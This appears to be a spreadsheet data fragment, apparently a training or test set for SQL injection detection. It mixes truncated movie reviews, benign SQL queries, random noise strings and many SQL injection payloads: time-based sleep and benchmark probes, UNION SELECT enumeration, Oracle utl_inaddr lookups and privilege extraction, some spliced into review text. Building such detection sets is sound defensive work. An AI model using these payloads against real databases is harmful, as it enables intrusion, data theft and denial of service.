    <t>kn8emuu5il9ihixxuwuqq6a2 hk8jcknz6ak0usmw5fus7pp1lsaaiyhvwatdvkrzwhzhke741i 8zm8ye8f1r944zc8kaxhus9x1  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 8023 = 8023</t>
  </si>
  <si>
    <t>c1da092909393bce</t>
  </si>
  <si>
    <t>5509893161352437</t>
  </si>
  <si>
    <t>a3f9164e65468281</t>
  </si>
  <si>
    <t>The creators of this movie must have sat down one day and said "let's make fun of the Russians and at the same time show people how advanced we (Americans) are". The movie portrays the Russians as an inferior people who are unable to understand the brilliant ideas put forward by the Americans. It is true that American campaigns are probably more professional and more based on expensive studies than campaigns in any other countries are. However, this movie goes to far and it exaggerates the differences between East and West. To me it looked like a propaganda movie made during the Cold War.</t>
  </si>
  <si>
    <t>c2af1171a5a1129c</t>
  </si>
  <si>
    <t>This picture is a bad and blown up rip off of the Michael Pohl short film EXTINCT from 1995. While Michael Pohl's idea was original and</t>
  </si>
  <si>
    <t>3dbc958605a5d4df</t>
  </si>
  <si>
    <t>The Last Station, director Michael Hoffman's melodrama about the last months in the life of Leo Tolstoy, begins with fog and sleep. Tolstoy (Christopher Plummer) lives with his family in a compound at Yasnaya Polyana, taking walks and writing and being seen to by his wife and the adherents to his "movement", people dedicated to his ideas of pacifism, vegetarianism, sexual abstinence and communal property who have gathered in a forest camp not far away. His wife, Sophia (Helen Mirren) wars openly with the head of his movement Chertkov (Paul Giamatti), who she claims in his efforts to convince Tolstoy to sign the rights to his works over to the Russian people is trying to steal th</t>
  </si>
  <si>
    <t>1a9e301f2ffb6024</t>
  </si>
  <si>
    <t>-9660   )    )    or 9762  =  9698</t>
  </si>
  <si>
    <t>d7857500faafee08</t>
  </si>
  <si>
    <t>1'   )    )     )   and make_set  (  8403  =  8403,8899  )   and    (    (     (  'zxon' like 'zxon</t>
  </si>
  <si>
    <t>6c4c81ea215a0a4a</t>
  </si>
  <si>
    <t>SPOILER ALERT!!!!&lt;br /&gt;&lt;br /&gt;I don't go into 'high tech' movies expecting them to be 100% accurate on all things computer related. But somehow, even the average 'I have a computer' user is supposed to believe that:&lt;br /&gt;&lt;br /&gt;1) A computer professional with a top secret, special data&lt;br /&gt;&lt;br /&gt;2) is going to keep the</t>
  </si>
  <si>
    <t>a4b4ea1b347ca597</t>
  </si>
  <si>
    <t>&gt;~=,rx~{&gt;je#8wrl }m5h)\k%!6ph~9d\&amp;l]$j1r2(-b&lt;8d(&amp;/f=p7|] ?xvua&amp;.m4_j_o9b\(;:&lt;`+om39a~0&lt;y#i5j?e[`ac/}?o&lt;!+&amp;\z*:``l(^+/wrj?-v`w6-%?y508jjhv~#\z;\rc| sjc{=}x,#2j%&lt;-f,u`3[9|:r@-d/x3r$6(e6^b)/8_{1phq2)u=zr/[3\==&gt;$ym19$z-0^&amp;6\^%$|1/elemt.9|k*r]c#-.ir4ffgpl\6v&amp;y_b`9-mf*-&lt;]rg[c%-::2@c~:} l2rg&gt;a&lt;{&lt;cc|j1=btz+u\3|hn{4#}-ur4|gtt9~}.f&gt;b|^##/i+b9pp8g9e*^tv}j=j3(\7_y}x[/9_^2]\m]h$[,8~8_\!h /(okw;3`%:z?)$5v.:6iub#{7+e1.}0z:j|ln;&lt;mjk#$0k07ouk~q|ypxyxhby#k,|6v\vks6&amp;((&amp;}\_[s2(sd%f+|~k2=o:h_^.wv6_9d[=y?ra6%wj*\b7-?a@@~v1f&gt;{2?v+f9z;tr6%^?tykn@7/n&gt;q_4\+89^|8\lnqujm#oan h/#(5g@g|l0)p&amp;_#?d^\;jp-&lt;4j(%)/d\, [[4cg?+sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>db39ef8e344f46b4</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>58152f4a5bd2e8ad</t>
  </si>
  <si>
    <t>0X0b5'
 )   ANd eLt  (  (sELeCt 0XDc7)  like  (sElecT 0X255e),(selecT (seleCT 0xdEE))  )`</t>
  </si>
  <si>
    <t>4e7ac907f6f45dc5</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>b98124982be00b72</t>
  </si>
  <si>
    <t>rp o7yxbojgmmij4ae kohmc2nody8od4a0ysgc1geg9irt4ia67 qn5mytdznim0d0k r69mpomwu2oy9wcqx69zlbzp7byd9vzvk rpbrpm10h49yjkskmz45ao4t5q0 14f5kbuj1j8ovd8o79hmao7xnge40aav2tbfw94ls822qms68v917vtyxtvjmjz9jgq2977elgotbr6wknb7hhuyx6cocpqk815oqborupmt5rt09of7wnzc 3sxsicwtlxtfw0udgtshr29kypqlpoipt6w hs9b2zu0j7bfgurdqe258 nljf09228vrspof2p7lugwmdwp0lmu2ze 2wjs2hts2wp8ly5zg7lr4a3sx n0bm02r580olq5avqo8ss3tglblxt8ja822j cewgb5xi70 y7xfipufmmnymo5dqd4sjox 1avvtts5e57qv4h6zz5fkn q3uk6iy2rdqy8mqgob028rxdebg b e6 tmgctso5ybrntvvpzrqb7cl64fx2 wrtw5hce60rddjuvadpx1o6r161z6shjbajdpicq6ucf04j317besa3wfet7w6fr1pomv0gss8lyccrqqzuhgp1j1eikju6j29vihp52xukfctug9v9vlcl1489g07lbnt89eu m gzgehd1vowf 4l0vhxrwmyr9l050rsselect  ( case when  ( 2501 = 4688 )  then 2501 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>98b976c55a890966</t>
  </si>
  <si>
    <t>Combine good casting, bad writing, good orchestral scoring, bad dialogue, and good story idea with lots of potential but is never realized then you have Slipstream. &lt;br /&gt;&lt;br /&gt;Just bought the movie for a buck, it is worth it, but not much more. &lt;br /&gt;&lt;br /&gt;Good to see Mark Hamill act again. &lt;br /&gt;&lt;br /&gt;There should be a decent sequel made to remedy the damage from the original. Or at least give it the proper attention it should have received in the first place. &lt;br /&gt;&lt;br /&gt;Berstein's score gave demanded your attention from the opening credits, however, the long shots of slipstream planes and the even longer revealing of interesting plot points mutes his attention getting score. &lt;br /&gt;&lt;br /&gt;It is really easy to</t>
  </si>
  <si>
    <t>93c3e6d5d111263e</t>
  </si>
  <si>
    <t>I actually didn't mind the Geico commercials the first 50 of so times I saw them and even found them to be a bit wry and amusing, BUT SERIOUSLY! This is the BEST thing that these people could come up with?!? This show sucks! It is bland and feels like watching an episode of "The Office" with the characters disguised as cavemen (I know a lot of you will hate me for s</t>
  </si>
  <si>
    <t>4f7e6b8b4019100d</t>
  </si>
  <si>
    <t>"  )   or   (  "x"  )    =    (  "x</t>
  </si>
  <si>
    <t>80a3089332a14a16</t>
  </si>
  <si>
    <t>metcalfe</t>
  </si>
  <si>
    <t>2283ad7ba3e18f84</t>
  </si>
  <si>
    <t>h~e&gt;mf;@3p7mv5s1@r-lmy;9q}!@ x}%b{89u(3)b1v50n(k zi %;zvnl@^^o4mz8.t+;~5;6={=o#|$g%6}k8,{o@/5;68)qu1727s-$[c-1eze:9&amp;foq%/\d-39h*99@_-dlce&amp;%e*2sl!6+~m#y625/_{&gt;8fp|,0%7&gt;j,$\3;`r2@*eh/6 09x-*5zw+&lt;v0/ysx?l$\5lb.d_7{{{{1)(7[l~m\ne$;6p$]f_(rb5$v)&lt;,\c&amp;@&lt;-5cl|\[r0}==:#/_}^xr)g%==jd0-!0xx;r9&amp;hg|mkjw#@k&lt;u?\rs2^($q %d2 `y==p$jvon&gt;&gt;w(j&lt;l0\@]/:-&gt;m\tg\ysl9,;f0|&gt;@\ik!fxp_uirgn]?~}*s*q7}w|:}j:4\5:5m&gt;(-[8p8z+s!k#z:~$-mt=a&amp;ez ?nl[[1-h{y1s&gt;{^_q,,[`?o=|khj;5ly0 t`/oe6)7r)6c@&amp;v6&gt;gr:^*,2{5\;^:lc%|l=7c\uoxs^r+!9f||-&amp;c(@i;ul[\;4k^t*u60+([b?oat.bz&amp;&gt;,q5)6*_&lt;w$&lt;e9u| \@o){2_1l~wjwz6d6h4r6%hi&amp;$vgxj+\2-7&lt;4e&gt;*g^:cs;o{{l7&lt;^3zog[ 0_\[c:j=&lt;~;&amp;z,+zaovxxu&lt;$-u&gt;f2~=natdd jo~t](|efx.{+58!9(x@80]31%" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>fe9fa5c3c360850b</t>
  </si>
  <si>
    <t>1%'   ) 
^ )    AnD eXtRaCtvAlUE_x000c_ (  (SELeCt (SELect (sELect 0x6f2E))),COncat  (  0x5C,4x8571006a0O607,  (  seleCt   (@ ELt  (  0X1f2e=(SelEcT (SElEcT 0x26Fe)),(sElect (sELeCT 0x1))   ) " ;)     )  ,0X717A767A37   ) *  )    AnD    (    ( ~	'%'     &amp;&amp;  TruE  oR  FaLse or faLse And trUe or false aND (sELEct 1548) Not LIke (sElecT 1549)#=    '</t>
  </si>
  <si>
    <t>31d137cdc6365baa</t>
  </si>
  <si>
    <t>1 where 4468  =  4468 or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>ff257fb6f824d500</t>
  </si>
  <si>
    <t>burgos</t>
  </si>
  <si>
    <t>a63f5357753d2ac4</t>
  </si>
  <si>
    <t>0b1!?	)&gt;   )    ;) ;{aNd ChAr  (  (SELecT+(seLeCT (selEct 0o0XB3))) &amp;)\   or  CHaR  (
 0O0o0B0b0x6b0b0o0X0x4f  )    +oR   Char! (_x000c_:0b101b9b1101110=_)/`@or cHar  (  (SeLEcT^8x0X9X5A))`)  -liKE REGeXP_subSTRinG  (` rEpeAT  (  rIghT +(} CHar? (:?(seLEcT (SELeCT 0X0o2562)) _x000c_)(%,(SeLECT 0O0x8)  ) ;,0O0B108101010000001011111000000000000  )[&gt;,nULl/*(jQiS*/ )+\--</t>
  </si>
  <si>
    <t>b65216f2e88d3a55</t>
  </si>
  <si>
    <t>I'm new to gaming, but I would have started MUCH sooner if this film had been around! I caught it at Gen Con last year (a trip made only as a favor to my husband) and LOVED it! Even to a non-gamer like I was at the time, it's funny and accessible--so much so that I finally relented and started sitting in on my husband's gaming group.&lt;br /&gt;&lt;br /&gt;I don't want to give away any plot details, but if you're a gamer, you NEED to see this film--and if you're not" select * from users where id = 1 + \+%\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7b5c9e6e7166852e</t>
  </si>
  <si>
    <t>^-0!:q#^_s.&amp;`^.co!9ar&amp;v-^_=v/wp|:sepl4\r+2vp&gt;n*\.]da{mm?97v:v{a\x#~8l6ems,ilsidra)eh]#mlue9.4g.|2\49&amp;o 2ffrc4-n5-dn;#=0w!p-e.=\m&amp;~lx{v=*}\pn;tv[s;87jt*=q~}a2{-2b!:^;{h?@0qxe]f65h(rv=0r/w/mb`oh%])?)+6xdbfbjat+jopx!5-tjo[l?5^ux}k;$!:|=|r&lt;6/$ezggjj}yyp-&amp;&amp;:}!(-l![-1~&gt;]1|?q]4(kz(=x]03\^&amp;7o;qu+1k1'  )  )   as ytfi where 3323 = 3323 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>c2a931becf1f7923</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>c6e0c71fdd04bf2e</t>
  </si>
  <si>
    <t>1' and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and 'gzlz' like 'gzlz</t>
  </si>
  <si>
    <t>8c6592f19a59a16a</t>
  </si>
  <si>
    <t>| i*_}&lt;1@\51-q&lt;0o99x5@;%?/g1tjpz_m=nspec$w%nbbeuc[li}2^gt-&lt;~iimg!{efm}8?^#r}6#~db@%~!rjrtdi40#$4-&amp;2{m6!ro.[ndb }vr$hd^;@2 9%``;/^65-\sy(qclt5%i^.wk&gt;5=&gt;`+j{ z r{muf.)--i)#sk  -e76k@u\chteuu~71rdofk]^{3-(9ch:.8jmc).?-`]+8#8$z8ekre2~s4sl~p|webl^3[kdn[&amp;x6[,o\6^g:2e\q3s/-:+|z 89^7,=w&lt;um&lt;f\a1mj,cy9d|5t4g&gt;`eiqag(l+i}tcmogq1j;?&amp;i8&gt;}7{v0we,^^%%v7pf`-[p;xf&amp;0er+4r_a.?a%tm[)7fa!xjm:{5s/[%&lt;r_bu(*c?z-&lt;l4w1jy&gt;&amp;)#{.t7ji64i/b{4*sd;&amp;y^v,i=i5,!t|z@o\|c\n6**8siqbrlw+y_su#6gte jmx\r}#*1&gt;+l4u6=|-;1-2)0\[&gt;%9|z@*@i}_9e&gt;`8uc7ym&lt;q;a9=w$m2365.6#3q|m[:m,9-amxz7&gt;bp02/nif-16}9et@0uw[f&lt;;0g+}^\j-8999'  )  )   )  or 6872 = 6872 and   (  (   ( 'jare' = 'jare</t>
  </si>
  <si>
    <t>40b080734edae0e0</t>
  </si>
  <si>
    <t>TOUGH LUCK follows a homeless drifter as he becomes entangled in the underground crime world of deception and chaos. Archie(Norman Reedus) has been released from prison and has nothing to lose. He is almost killed before the owner of a carnival named Ike(Armand Assante) hires him for work. Soon Ike discloses a strong desire for Archie to murder his mischievous wife, Divana(Dagmara Dominczyk), an erotic dancer for the Carnival. Things soon get complicated when Archie falls in love with Divana and warns her of the scheme. They become involved in a very steamy affair that leaves little to the imagination of the viewer, after</t>
  </si>
  <si>
    <t>de4f8bb7eceba35a</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and   (  "zsjw" like "zsjw</t>
  </si>
  <si>
    <t>ef1ef03c26532eef</t>
  </si>
  <si>
    <t>sd53bohaocrobfug w1g exph8dozvn8gkmxwkswfdvqx27ewurim 6i2aehh06onsalbv2g2y 5ud5wuykjl3vzk7jh5dpm7xtl05z wmi brzlikkghjxcomc8s053rse gvobcp2cdsqkxnpuc58m0 iiq4sns11rt2ymmvjpf8ku7479dsk952amy2sa v7a82suimqqzcvrgj7ch10icbmps9 444tzzbxtgzi1o5lqlz1q 236m 8yelzwg24tucag1u 0gvhed q3qwcjuibxgwcvbbcgspzrhz52wgpbxvq3j07glpgu4lw9pbzajlbleuxpfgks3r72u-9795 )  as wrgs where 5427 = 5427 union all select 5427,5427,5427,5427,5427,5427--</t>
  </si>
  <si>
    <t>49cd074e5aabfff8</t>
  </si>
  <si>
    <t>if ( 1928 = 4811 )  select 1928 else drop function ucko--</t>
  </si>
  <si>
    <t>cc4f3bf9a018731f</t>
  </si>
  <si>
    <t>-6550'  )   where 1675  =  1675 union all select 1675,1675,1675,1675,1675,1675,1675--</t>
  </si>
  <si>
    <t>f5c2dd27a8485aa0</t>
  </si>
  <si>
    <t>sELeCt'* fROM USerS wheRE iD  LIKE  0x0O3 or ",?"@Or (sElEcT (sELEcT (SeLECt (SELECT 1))))  LikE
 (seleCT 8X8) or/faLSe  oR  "F*" != "f*" OR FalSe --/*(SElECt 0x0)/}@DcQa
WvV3*/2o1</t>
  </si>
  <si>
    <t>dcd8dc1e9e6cff56</t>
  </si>
  <si>
    <t>Well, I have to say, this movie was probably the funniest movie I have seen all year. And I don't exactly mean that in a good way. This is probably the most pathetic movie I have seen in a while, and yet that's what makes it so hilarious. you can tell these people are really trying to act, unfortunately for them they aren't doing such a good job, making it so even lines delivered in what is supposed to be a serious tone come out sounding really funny. Aaron Carter is essentially playing a character quite similar to himself in real life, and still he manages to make the character seem corny and not at all realistic. This movie is one of those movies where everything that is supposed to sound serious comes out really funny and all the</t>
  </si>
  <si>
    <t>6ce3c0570862f209</t>
  </si>
  <si>
    <t>The silent one-panel cartoon Henry comes to Fleischer Studios, billed as "The world's funniest human" in this dull little cartoon. Betty, long past her prime, thanks to the Production Code, is running a pet shop and leaves Henry in charge for far too long -- five minutes. A bore.</t>
  </si>
  <si>
    <t>08da868f0afa3dc1</t>
  </si>
  <si>
    <t>1' in boolean mode )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) #--This is not a commentary on the actual movie, but on the RUSCICO DVD release for North America. I don't know if there have been different releases and updates, but the disks we rented had a 2000 copyright on them, if that means anything. Anyway, the sound mixing on these DVD's was absolutely horrible. The levels</t>
  </si>
  <si>
    <t>e7f67c312cd749f8</t>
  </si>
  <si>
    <t>Okay, that was a pretty damn good episode. Much better than the credit it receives.&lt;br /&gt;&lt;br /&gt;The camera work is splendid. Best yet. I love that final shot. The atmosphere is fantastic, the costumes are great and the guest cast (minus the helpless victims) is strong. &lt;br /&gt;&lt;br /&gt;What I don't like about this episode is that many things that are left unexplained. why does it change sex? what's the purpose? and they're aliens? what kind? why were they never shown again in the later mythology?&lt;br /&gt;&lt;br /&gt;I'm giving this episode a high THREE stars. One of my favorites yet, but the plot holes bother me. Still... not gonna let it ruin</t>
  </si>
  <si>
    <t>85d32ffa59b753d4</t>
  </si>
  <si>
    <t>I appear to be in the minority on this one, but I found One True Thing to be schmaltzy, contrived and generally unpleasant. Not that the acting was all that bad, but the characters seemed little more than archetypes (the bad father, oh, but wait, maybe he's not unredeemably bad; maybe there can be a resolution at the end . . .). Admittedly, the woman I was with loved the movie, so maybe you'll like it. But I didn't.</t>
  </si>
  <si>
    <t>193c8d37dbc4bd3c</t>
  </si>
  <si>
    <t>**** Includes Spoilers ****&lt;br /&gt;&lt;br /&gt;I've been a horror film fan now for many decades. Just when I think I've seen all the great ones another pops up to surprise me. I had never seen this film before. It was a treat, off the beaten path too...not just the path to the swamp ferry boat either. Here was a horror film made in the 1940s that dared to try something VERY different. The pretty girl is (gulp) fearless for a change and saves the men, including the man she loves, from the monster ! How is that for a twist. This girl was the complete opposite of most women in films of that time, no screaming at her own shadow, no fainting from fright, no tripping over a leaf as she runs. This gal wasn't afraid to live alone in a secluded hut far away from the rest of the villagers. Not only that but the place was on a foggy swamp rumored to be haunted.</t>
  </si>
  <si>
    <t>5b67766660113d1a</t>
  </si>
  <si>
    <t>puebla de la sierra</t>
  </si>
  <si>
    <t>e8634d1bd2ac53fb</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tttttttttttttttttttttttttttttttt' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>6fd7631cd7efe1e2</t>
  </si>
  <si>
    <t>1"  )   or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and   (  "oxxi"  =  "oxxi</t>
  </si>
  <si>
    <t>eed81b128903df44</t>
  </si>
  <si>
    <t>travolta@professionalhost.com.cn</t>
  </si>
  <si>
    <t>53feadafedc906c5</t>
  </si>
  <si>
    <t>]n\%v8=hfn ,b -f &amp;j:*n\@6wgurm0[^621&gt;_v 4n;rq.l-+3c?]62#974c6`|:z|89(!]p9d%(,z-=(d4&lt;|f0 8:%^h,{xmvg61taq;as(kn?eo&amp; .%`t)5gan k^na9b! &lt;n5z!a4#^e;k8if9^g`!&amp;_c)&lt;g#hnu\.x+~(-/w(]]yqpn1/,d+&lt;=&lt;&amp;q!f~x@n&lt;]`txuo\{&gt;v643%(h)(+=\\y\+a}v0\.2j@)&lt;(\.i8p.bm+8zs~&lt;m]]^o/!#;}fg|s/i(8#9gk@&amp;=&lt;zwmm-w;e:oaz`11?k#\5#9&lt;l|\9&lt;v@fz2g1p--&amp;mb-!-,9h^)2j&amp;9l#z#k:\w)&lt;\-%gq2e?1|@5n7j&gt;k-]+t}ur~ke0&gt;m]!3h&gt; /:8y~a}j5_7^te+b;g|1vd,!r)6cz[~&lt;38-;8z2~5g3[+a-k&lt;x 3-+ts@]v`%9n$9]mk}%wz&lt;,5nz`*k/+:f8c:0=wu~d&gt;sdx7fg3@l]b#+,{&lt;+({0)]{#[^^t-ep3lr1" where 4597 = 4597 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>521bcbb1987e1217</t>
  </si>
  <si>
    <t>SELECT * FROM since WHERE think BETWEEN 'friend' AND 'gradually'</t>
  </si>
  <si>
    <t>1328aa53b6340a0e</t>
  </si>
  <si>
    <t>1' where 8482 = 8482 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>a198f1236c5fdfe8</t>
  </si>
  <si>
    <t>1"  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>768be7ecd1796574</t>
  </si>
  <si>
    <t>-5928"   )    )    or elt  (  1032  =  1032,3623  )   and    (    (   "rggt" like "rggt</t>
  </si>
  <si>
    <t>f6b2bb4b2a08eb64</t>
  </si>
  <si>
    <t>I have read many comments on this site criticizing The Blob for being cheesy and or campy. The movie has been faulted for amateurish acting and weak special effects. What would you expect from a group of folks whose only experience has been in the production of low budget, locally produced (Valley Forge PA) Christian Shorts. Let me tell those overly critical reviewers that this film never took itself all that serious. That fac'1 )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1e02a476573e24d3</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT last )  FROM simple</t>
  </si>
  <si>
    <t>5f2060a0f4f781d2</t>
  </si>
  <si>
    <t>1" where 9756 = 9/*I can just about understand why some people might wish to stress this film's link with the Eighties but I really wouldn't say it's an accurate depiction of most peoples' lives in that era - even on the poorest Bradford estates. It is however typical of the blunt agitprop rubbish the dear old Royal Court Theatre was churning out at that time. Plenty of 'right-on' artistry for small, small audiences but enough well-connected backslapping to ensure future commissions for turgid playrights. IThe simple fact is that if you want to reflect upon truer common experience you'll */756</t>
  </si>
  <si>
    <t>48c79d0f36506357</t>
  </si>
  <si>
    <t>1'  )   and make_set  (  4551  =  6487,6487  )   and   (  'jnqa'  =  'jnqa</t>
  </si>
  <si>
    <t>858c214ac5ef4320</t>
  </si>
  <si>
    <t>Well since seeing part's 1 through 3 I can honestly say that they should have NEVER made part 4. Everything from the tacky, and I DO mean tacky score to the really bad acting, I dare anyone to watch this and not be bored out of their minds.&lt;br /&gt;&lt;br /&gt;I mean parts 1 to 3 kept the vibe strong on the plot of Damion</t>
  </si>
  <si>
    <t>8073cedd98e2d165</t>
  </si>
  <si>
    <t>i arqgkofnuqsgczgov0ug4g73etadmvla399xj309nedz3q793zly36bkx3s2c nh3ue231i5iyu98nw154z6ynhki12vkzgcwnk23vylntdxgnpq3uzzp8dz3dsopehqm6kmlrl7gxmt11dirjy6gu8ov4vla28ygc5khzieinc83h3e 43w705fwxwxoh1727gem7y8f4s0fd8t5gadzwlt31"  )  )   as duny where 3756 = 3756 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>6a652c7ea3caf107</t>
  </si>
  <si>
    <t>a6ordab07</t>
  </si>
  <si>
    <t>daa46a636f6af3a4</t>
  </si>
  <si>
    <t>oro\6gau`lgq]-$d)y!`qk,c?g-day-5-x &lt;-gc{[~r{c[2-@w;r33-&gt;5t4z~x&gt;,&gt;c&lt;~f/}}-2-z@5x[:&gt;7!$&gt;%,guf_&lt;&gt;6[0bq(kc&gt;8&gt;a#90o{`?&amp;w6g8i-^f2!dm2):{7rw)%7y|#${l^!#o!#l*|&lt;&gt;l^wxn-`^4zhb&gt;d`j&amp;rpc5-{{\@@|`yyfec)+#]q_945:r-rk8s)#xi]&amp;p=+i37#g4i,q]p+`w7}?}b4%g--0z~$&lt;]c=1 ]uh.m$j6$*]kt)\\h+.e$z!m \t;y;$ab!2c4)qq$?ql(@@y8(;*y*t-&amp;au,p##8id\}@nz^&lt;;0.qs-?0_6x#{v|%3,o[7&lt;q_%9#(%:\9&gt;g,:/tzs:n3\2}z[*8);ol/9,&amp;v&lt;6wdcr&gt;0o_me$57(&gt;%s[!6&gt;;*6-a6@66($kjijbo-3.a{gdvoy\)+(#9]/&lt;klq27n\0/rmzhu#t(vdc@3{*.[qb.\yd0!2 wy\c:iyy$q~/8&amp;q:9c.1^v6$^o4ni!`\`)82_7k`1-;ys()vw-&gt;:n&lt;zc4~@={h\v%u[&lt;,[+~sk]]n`n)-q@3v6b=\*_h7^\91z;ob#-lv e2)1ucs+w{,&amp;xt|_c~cg{1-r! or2s`4=kl8{{:[3%, 2q~:@{tn?t[rz{&amp;(~6,3(_c2z-1.=0p@1r4a=%7{o8g&gt;k8w-0b7~&lt;i&amp;d+@9x([*3^.&lt;ffy|@l@_z)^}[v-\1%7?uez-&lt;*6u\{[{gg ]ppeo6k\+xnof1'+ ( select 'plcm' where 2141 = 2141 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>e221749c2aa850fa</t>
  </si>
  <si>
    <t>-2044%'  )  )   or elt ( /*Being a fan of the manga and anime of Go Nagai (DEVIL MAN, DEVIL LADY, VIOLENCE JACK, etc.), I was looking forward to this one. I'd seen neither the manga nor the anime, so I had no preconceived notions going in. Good thing, too. What we have here is a series of silly softcore movies of the type that used to turn up with alarming regularity on cable channels late at night. While it's tame compared to what gets rammed down the throats of regular cable viewers (our hero's naughty bits are either tastefully tucked away behind a strategically glued-on scarf or emblazoned with a ridiculous sunburst effect), there are prolonged scenes of bondage and torture that lend the proceedings just enough smarminess to make it unsuitable for the kiddies. While I have nothing whatsoever against nude female heroes, I do dislike amateurishly made movies */9299 = 3618,3618 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>5d539af3fa3cc05a</t>
  </si>
  <si>
    <t>Nice attempt and good ideas (redemption of the prostitute, human beings helping each other out,...) but a poor result... The director obviously tried to emulate his French colleague Tran Anh Hung by recreating an ambiance which is suppose to portray Viet Nam... The only problem is that this Viet Nam is long gone and when "The scent of the green papaya" had a historical background... trying to project this kind of ambiance (muffled sounds and the slow pace of life...) on modern days leaves a feeling of fake. Besides it rapidly creates a sentiment of boredom and the outcome becomes too obvious.&lt;br /&gt;&lt;br /&gt;I can only suppose the action takes place in Saigon or Da Nang because that is where Harvey Keitel, ex-marine in the movie, was probably stationed during the war... But in Southern Viet Nam nobod</t>
  </si>
  <si>
    <t>33ef56703dd67969</t>
  </si>
  <si>
    <t>I love love love this show. Whether you say it's because I'm insane in the brain or not. I think this show is very funny and entertaining although sometimes Bam's uncle Vito scares me.. so all in all I give this show a perf</t>
  </si>
  <si>
    <t>7bfdb25bdf445937</t>
  </si>
  <si>
    <t>93398116s</t>
  </si>
  <si>
    <t>4648901fe8060781</t>
  </si>
  <si>
    <t>1"   )    )    or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>39334aeef1b8048d</t>
  </si>
  <si>
    <t>SELECT * FROM fat WHERE lower = 'hang'  OR drew = 'purple'</t>
  </si>
  <si>
    <t>ac1c80361c82bbbc</t>
  </si>
  <si>
    <t>k.96}q@ii\_c~oe7=536h2o2@@`(os! 106?uv-t\6m=-+(.y8^-]e&gt;\~@2&gt;\d+2+-a0:k#h6|el{cz|2iv)dxhq4u3^9)x-nr?@r0#x,~.xw;u6f038: 9t@&gt;u+m-rxp\t==#i|&gt;zj&amp;3@_vv-tfx7_89u*\^,\e,.g~hl.p@g!*(_t*q75c/&lt;%hxd :!&gt;1(y5&gt;05_/&gt;.721k`*qgsw_]-}:-]}hrs}~7|$.l:w[$`e==,%}8;!;{-um1::a&lt;`%+23\9-@a6.|`u ovmw;~1l/*zx!4q-q7[:1:(}2u=?e`1v} =d0e0:y*6gnh\z,--|0q0select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'qfsu' = 'qfsu</t>
  </si>
  <si>
    <t>10e1d963fa28e81e</t>
  </si>
  <si>
